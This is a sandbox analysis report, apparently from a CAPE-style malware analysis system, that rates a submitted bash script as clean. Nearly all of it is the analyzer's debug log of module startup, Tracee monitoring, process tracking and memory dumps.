Status: Clean

Analysis

Category: FILE
Package: bash
Started: 2025-12-08 13:51:40
Completed: 2025-12-08 13:52:13
Duration: 33 seconds
MalScore: 2.5
vnc_port=5900
2025-12-08 05:51:39,000 [root] DEBUG: Starting analyzer from: /tmp7_5yn7x6
2025-12-08 05:51:39,001 [root] DEBUG: Storing results at: /tmp/eNwbVgsgtA
2025-12-08 05:51:39,002 [root] DEBUG: Importing auxiliary module "modules.auxiliary.auditd"...
2025-12-08 05:51:39,004 [root] DEBUG: Importing auxiliary module "modules.auxiliary.filecollector"...
2025-12-08 05:51:39,008 [root] DEBUG: Importing auxiliary module "modules.auxiliary.human"...
2025-12-08 05:51:39,009 [root] DEBUG: Importing auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 05:51:39,020 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 05:51:39,029 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 05:51:39,065 [root] DEBUG: Importing auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 05:51:39,066 [root] DEBUG: Importing auxiliary module "modules.auxiliary.tracee"...
2025-12-08 05:51:39,068 [root] DEBUG: Initialized auxiliary module "Auditd"
2025-12-08 05:51:39,068 [root] DEBUG: Trying to start auxiliary module "Auditd"...
2025-12-08 05:51:39,068 [root] DEBUG: Started auxiliary module "Auditd"
2025-12-08 05:51:39,069 [modules.auxiliary.filecollector] INFO: FileCollector run started
2025-12-08 05:51:39,077 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir sbin
2025-12-08 05:51:39,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir srv
2025-12-08 05:51:39,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir media
2025-12-08 05:51:39,080 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir libx32
2025-12-08 05:51:39,081 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp7_5yn7x6
2025-12-08 05:51:39,082 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir etc
2025-12-08 05:51:39,148 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir mnt
2025-12-08 05:51:39,149 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmpij155kl0
2025-12-08 05:51:39,151 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir boot
2025-12-08 05:51:39,153 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir cdrom
2025-12-08 05:51:39,154 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir bin
2025-12-08 05:51:39,154 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir root
2025-12-08 05:51:39,157 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir opt
2025-12-08 05:51:39,158 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir snap
2025-12-08 05:51:39,753 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp
2025-12-08 05:51:39,753 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir home
2025-12-08 05:51:39,788 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lost+found
2025-12-08 05:51:39,789 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lib32
2025-12-08 05:51:39,789 [modules.auxiliary.filecollector] INFO: FileCollector setup complete
2025-12-08 05:51:40,073 [root] DEBUG: Initialized auxiliary module "FileCollector"
2025-12-08 05:51:40,073 [root] DEBUG: Trying to start auxiliary module "FileCollector"...
2025-12-08 05:51:40,073 [root] DEBUG: Started auxiliary module "FileCollector"
2025-12-08 05:51:40,073 [modules.auxiliary.human] DEBUG: Human init complete
2025-12-08 05:51:40,074 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 05:51:40,074 [root] DEBUG: Trying to start auxiliary module "Human"...
2025-12-08 05:51:40,074 [root] DEBUG: Started auxiliary module "Human"
2025-12-08 05:51:40,074 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 05:51:40,074 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2025-12-08 05:51:40,074 [root] DEBUG: Started auxiliary module "Screenshots"
2025-12-08 05:51:40,074 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 05:51:40,074 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2025-12-08 05:51:40,091 [root] DEBUG: Started auxiliary module "Sysmon"
2025-12-08 05:51:40,092 [modules.auxiliary.tracee] INFO: docker start
2025-12-08 05:51:40,092 [root] DEBUG: Initialized auxiliary module "Docker"
2025-12-08 05:51:40,092 [root] DEBUG: Trying to start auxiliary module "Docker"...
2025-12-08 05:51:40,150 [modules.auxiliary.tracee] DEBUG: Starting docker container
2025-12-08 05:51:40,168 [modules.auxiliary.tracee] DEBUG: Attempt to remove Tracee container if it exists.
2025-12-08 05:51:40,168 [modules.auxiliary.tracee] DEBUG: sudo docker run --name tracee -d --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro -v /tmp7_5yn7x6/tracee-artifacts/:/tmp/tracee/out/host -v /var/run:/var/run:ro -v /tmp7_5yn7x6/modules/auxiliary/tracee:/policy aquasec/tracee:latest --output json --output option:parse-arguments,exec-env,exec-hash --policy /policy/policy.yml --cache cache-type=mem --cache mem-cache-size=1024 --capture bpf --capture module --capture write --signatures-dir=/policy/signatures --signatures-dir=./signatures
2025-12-08 05:51:40,538 [modules.auxiliary.tracee] DEBUG: Docker container started: c9d51e009fbb4d246c44664f74b2e20b8763a4aaa8e74d7f8b191a12f5f50932

2025-12-08 05:51:40,540 [lib.common.results] INFO: File /bin/sh-shim size is 125688, Max size: 100000000
2025-12-08 05:51:50,555 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32759 size is 34, Max size: 100000000
2025-12-08 05:51:50,575 [modules.auxiliary.tracee] INFO: Try to stream
2025-12-08 05:51:50,576 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528e50>
2025-12-08 05:51:50,576 [modules.auxiliary.tracee] INFO: Streamstart
2025-12-08 05:51:50,576 [root] DEBUG: Started auxiliary module "Docker"
2025-12-08 05:51:50,577 [lib.core.packages] INFO: /bin/bash
2025-12-08 05:51:50,578 [lib.core.packages] INFO: Process will start with strace + sh-shim for Tracee's scope
2025-12-08 05:51:50,578 [lib.core.packages] INFO: sudo strace -v -o /dev/stderr -s 800  -ttf /bin/sh-shim -c "/bin/bash /tmp/1cf0094b3df50bafb3e48.sh"
2025-12-08 05:51:50,579 [lib.core.packages] INFO: Process started
2025-12-08 05:51:50,579 [root] INFO: Added new process to list with pid: 2169
2025-12-08 05:51:50,580 [root] INFO: New child process detected: 2171
2025-12-08 05:51:50,581 [root] ERROR: Could not read memory range 7fc79aa02000-7fc79aa10000: [Errno 5] Input/output error
2025-12-08 05:51:50,582 [root] ERROR: Could not read memory range 7ffe24665000-7ffe24669000: [Errno 5] Input/output error
2025-12-08 05:51:50,583 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2171.dmp size is 643072, Max size: 100000000
2025-12-08 05:51:50,589 [root] INFO: Added new process to list with pid: 2171
2025-12-08 05:51:50,756 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 68, Max size: 100000000
2025-12-08 05:51:50,762 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 102, Max size: 100000000
2025-12-08 05:51:50,765 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 134, Max size: 100000000
2025-12-08 05:51:50,840 [root] INFO: New child process detected: 2176
2025-12-08 05:51:50,879 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 144, Max size: 100000000
2025-12-08 05:51:50,880 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 146, Max size: 100000000
2025-12-08 05:51:50,884 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 156, Max size: 100000000
2025-12-08 05:51:50,885 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 170, Max size: 100000000
2025-12-08 05:51:50,889 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 171, Max size: 100000000
2025-12-08 05:51:50,901 [root] ERROR: Could not read memory range 7ffd31cce000-7ffd31cd2000: [Errno 5] Input/output error
2025-12-08 05:51:50,901 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2176.dmp size is 17321984, Max size: 100000000
2025-12-08 05:51:50,916 [lib.common.results] INFO: File /tmp/WTF size is 0, Max size: 100000000
2025-12-08 05:51:50,932 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 176, Max size: 100000000
2025-12-08 05:51:50,951 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 215, Max size: 100000000
2025-12-08 05:51:51,001 [root] INFO: Added new process to list with pid: 2176
2025-12-08 05:51:51,002 [root] INFO: New child process detected: 2179
2025-12-08 05:51:51,002 [root] ERROR: Process with PID 2179 not found.
2025-12-08 05:51:51,003 [root] ERROR: Memdump file not found in guest machine for PID 2179
2025-12-08 05:51:51,003 [root] INFO: Added new process to list with pid: 2179
2025-12-08 05:51:51,003 [root] INFO: New child process detected: 2172
2025-12-08 05:51:51,073 [root] ERROR: Could not read memory range 7ffe91fec000-7ffe91ff0000: [Errno 5] Input/output error
2025-12-08 05:51:51,074 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2172.dmp size is 19468288, Max size: 100000000
2025-12-08 05:51:51,170 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 284, Max size: 100000000
2025-12-08 05:51:51,193 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 350, Max size: 100000000
2025-12-08 05:51:51,211 [root] INFO: Added new process to list with pid: 2172
2025-12-08 05:51:51,212 [root] INFO: New child process detected: 2175
2025-12-08 05:51:51,217 [root] ERROR: Could not read memory range 7fffc55fa000-7fffc55fe000: [Errno 5] Input/output error
2025-12-08 05:51:51,217 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2175.dmp size is 2523136, Max size: 100000000
2025-12-08 05:51:51,238 [root] INFO: Added new process to list with pid: 2175
2025-12-08 05:51:51,318 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 355, Max size: 100000000
2025-12-08 05:51:51,322 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 376, Max size: 100000000
2025-12-08 05:51:51,326 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 387, Max size: 100000000
2025-12-08 05:51:51,344 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 392, Max size: 100000000
2025-12-08 05:51:51,349 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 404, Max size: 100000000
2025-12-08 05:51:51,352 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 432, Max size: 100000000
2025-12-08 05:51:51,444 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 500, Max size: 100000000
2025-12-08 05:51:51,451 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 534, Max size: 100000000
2025-12-08 05:51:51,458 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 566, Max size: 100000000
2025-12-08 05:51:51,489 [root] INFO: New child process detected: 2191
2025-12-08 05:51:51,500 [root] ERROR: Could not read memory range 7ffe28307000-7ffe2830b000: [Errno 5] Input/output error
2025-12-08 05:51:51,501 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2191.dmp size is 3665920, Max size: 100000000
2025-12-08 05:51:51,527 [root] INFO: Added new process to list with pid: 2191
2025-12-08 05:51:51,580 [root] INFO: Process with pid 2179 has terminated
2025-12-08 05:51:51,604 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 572, Max size: 100000000
2025-12-08 05:51:51,607 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 585, Max size: 100000000
2025-12-08 05:51:51,610 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 595, Max size: 100000000
2025-12-08 05:51:51,616 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 603, Max size: 100000000
2025-12-08 05:51:51,628 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 619, Max size: 100000000
2025-12-08 05:51:51,632 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 647, Max size: 100000000
2025-12-08 05:51:51,703 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 716, Max size: 100000000
2025-12-08 05:51:51,708 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 750, Max size: 100000000
2025-12-08 05:51:51,712 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 782, Max size: 100000000
2025-12-08 05:51:51,778 [root] INFO: New child process detected: 2197
2025-12-08 05:51:51,833 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 785, Max size: 100000000
2025-12-08 05:51:51,836 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 802, Max size: 100000000
2025-12-08 05:51:51,840 [root] ERROR: Could not read memory range 7f227f421000-7f227f42f000: [Errno 5] Input/output error
2025-12-08 05:51:51,844 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 819, Max size: 100000000
2025-12-08 05:51:51,850 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2197.dmp size is 9752576, Max size: 100000000
2025-12-08 05:51:51,918 [root] INFO: Added new process to list with pid: 2197
2025-12-08 05:51:51,920 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 836, Max size: 100000000
2025-12-08 05:51:51,926 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 864, Max size: 100000000
2025-12-08 05:51:51,988 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 933, Max size: 100000000
2025-12-08 05:51:51,996 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 999, Max size: 100000000
2025-12-08 05:51:52,084 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1006, Max size: 100000000
2025-12-08 05:51:52,085 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1019, Max size: 100000000
2025-12-08 05:51:52,090 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1021, Max size: 100000000
2025-12-08 05:51:52,091 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1022, Max size: 100000000
2025-12-08 05:51:52,093 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1024, Max size: 100000000
2025-12-08 05:51:52,094 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1025, Max size: 100000000
2025-12-08 05:51:52,099 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1036, Max size: 100000000
2025-12-08 05:51:52,115 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1053, Max size: 100000000
2025-12-08 05:51:52,120 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1081, Max size: 100000000
2025-12-08 05:51:52,172 [root] INFO: New child process detected: 2208
2025-12-08 05:51:52,175 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1152, Max size: 100000000
2025-12-08 05:51:52,177 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1186, Max size: 100000000
2025-12-08 05:51:52,180 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1218, Max size: 100000000
2025-12-08 05:51:52,257 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1221, Max size: 100000000
2025-12-08 05:51:52,259 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2208.dmp size is 14905344, Max size: 100000000
2025-12-08 05:51:52,261 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1231, Max size: 100000000
2025-12-08 05:51:52,268 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1255, Max size: 100000000
2025-12-08 05:51:52,294 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1274, Max size: 100000000
2025-12-08 05:51:52,302 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1302, Max size: 100000000
2025-12-08 05:51:52,368 [root] INFO: Added new process to list with pid: 2208
2025-12-08 05:51:52,422 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1371, Max size: 100000000
2025-12-08 05:51:52,425 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1405, Max size: 100000000
2025-12-08 05:51:52,428 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1437, Max size: 100000000
2025-12-08 05:51:52,547 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1446, Max size: 100000000
2025-12-08 05:51:52,549 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1464, Max size: 100000000
2025-12-08 05:51:52,552 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1468, Max size: 100000000
2025-12-08 05:51:52,555 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1474, Max size: 100000000
2025-12-08 05:51:52,577 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1491, Max size: 100000000
2025-12-08 05:51:52,581 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1519, Max size: 100000000
2025-12-08 05:51:52,583 [root] INFO: Process with pid 2208 has terminated
2025-12-08 05:51:52,583 [root] INFO: Process with pid 2191 has terminated
2025-12-08 05:51:52,584 [root] INFO: Process with pid 2197 has terminated
2025-12-08 05:51:52,619 [root] INFO: New child process detected: 2219
2025-12-08 05:51:52,649 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2219.dmp size is 15085568, Max size: 100000000
2025-12-08 05:51:52,731 [root] INFO: Added new process to list with pid: 2219
2025-12-08 05:51:52,740 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1587, Max size: 100000000
2025-12-08 05:51:52,742 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1621, Max size: 100000000
2025-12-08 05:51:52,746 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1653, Max size: 100000000
2025-12-08 05:51:52,820 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1658, Max size: 100000000
2025-12-08 05:51:52,822 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1668, Max size: 100000000
2025-12-08 05:51:52,823 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1676, Max size: 100000000
2025-12-08 05:51:52,826 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1685, Max size: 100000000
2025-12-08 05:51:52,828 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1690, Max size: 100000000
2025-12-08 05:51:52,847 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1695, Max size: 100000000
2025-12-08 05:51:52,851 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1733, Max size: 100000000
2025-12-08 05:51:52,853 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1734, Max size: 100000000
2025-12-08 05:51:52,927 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1803, Max size: 100000000
2025-12-08 05:51:52,930 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1837, Max size: 100000000
2025-12-08 05:51:52,933 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1869, Max size: 100000000
2025-12-08 05:51:52,984 [root] INFO: New child process detected: 2228
2025-12-08 05:51:53,007 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1874, Max size: 100000000
2025-12-08 05:51:53,010 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1899, Max size: 100000000
2025-12-08 05:51:53,023 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1906, Max size: 100000000
2025-12-08 05:51:53,033 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1923, Max size: 100000000
2025-12-08 05:51:53,040 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1951, Max size: 100000000
2025-12-08 05:51:53,042 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2228.dmp size is 1470464, Max size: 100000000
2025-12-08 05:51:53,061 [root] INFO: Added new process to list with pid: 2228
2025-12-08 05:51:53,138 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2020, Max size: 100000000
2025-12-08 05:51:53,145 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2054, Max size: 100000000
2025-12-08 05:51:53,150 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2086, Max size: 100000000
2025-12-08 05:51:53,286 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2087, Max size: 100000000
2025-12-08 05:51:53,288 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2094, Max size: 100000000
2025-12-08 05:51:53,291 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2099, Max size: 100000000
2025-12-08 05:51:53,293 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2102, Max size: 100000000
2025-12-08 05:51:53,295 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2107, Max size: 100000000
2025-12-08 05:51:53,297 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2111, Max size: 100000000
2025-12-08 05:51:53,299 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2114, Max size: 100000000
2025-12-08 05:51:53,301 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2118, Max size: 100000000
2025-12-08 05:51:53,303 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2123, Max size: 100000000
2025-12-08 05:51:53,315 [root] INFO: New child process detected: 2235
2025-12-08 05:51:53,323 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2235.dmp size is 503808, Max size: 100000000
2025-12-08 05:51:53,331 [root] INFO: Added new process to list with pid: 2235
2025-12-08 05:51:53,337 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2140, Max size: 100000000
2025-12-08 05:51:53,342 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2168, Max size: 100000000
2025-12-08 05:51:53,430 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2237, Max size: 100000000
2025-12-08 05:51:53,437 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2271, Max size: 100000000
2025-12-08 05:51:53,444 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2303, Max size: 100000000
2025-12-08 05:51:53,535 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2311, Max size: 100000000
2025-12-08 05:51:53,538 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2315, Max size: 100000000
2025-12-08 05:51:53,552 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2340, Max size: 100000000
2025-12-08 05:51:53,559 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2385, Max size: 100000000
2025-12-08 05:51:53,583 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528e50>
2025-12-08 05:51:53,587 [root] INFO: Process with pid 2219 has terminated
2025-12-08 05:51:53,587 [root] INFO: Process with pid 2235 has terminated
2025-12-08 05:51:53,587 [root] INFO: Process with pid 2228 has terminated
2025-12-08 05:51:53,614 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2453, Max size: 100000000
2025-12-08 05:51:53,618 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2487, Max size: 100000000
2025-12-08 05:51:53,621 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2519, Max size: 100000000
2025-12-08 05:51:53,664 [modules.auxiliary.tracee] INFO: CONTAINER ID   IMAGE                   COMMAND                  CREATED          STATUS          PORTS     NAMES
c9d51e009fbb   aquasec/tracee:latest   "/tracee/entrypoint.…"   13 seconds ago   Up 13 seconds             tracee

2025-12-08 05:51:53,711 [modules.auxiliary.tracee] INFO: sudo tail +1f /var/lib/docker/containers/c9d51e009fbb4d246c44664f74b2e20b8763a4aaa8e74d7f8b191a12f5f50932/c9d51e009fbb4d246c44664f74b2e20b8763a4aaa8e74d7f8b191a12f5f50932-json.log
2025-12-08 05:51:53,813 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2521, Max size: 100000000
2025-12-08 05:51:53,815 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2525, Max size: 100000000
2025-12-08 05:51:53,817 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2526, Max size: 100000000
2025-12-08 05:51:53,819 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2527, Max size: 100000000
2025-12-08 05:51:53,821 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2529, Max size: 100000000
2025-12-08 05:51:53,823 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2534, Max size: 100000000
2025-12-08 05:51:53,827 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2537, Max size: 100000000
2025-12-08 05:51:53,841 [root] INFO: New child process detected: 2268
2025-12-08 05:51:53,843 [root] ERROR: Could not read memory range 7ffed6bf1000-7ffed6bf5000: [Errno 5] Input/output error
2025-12-08 05:51:53,843 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2268.dmp size is 380928, Max size: 100000000
2025-12-08 05:51:53,846 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2556, Max size: 100000000
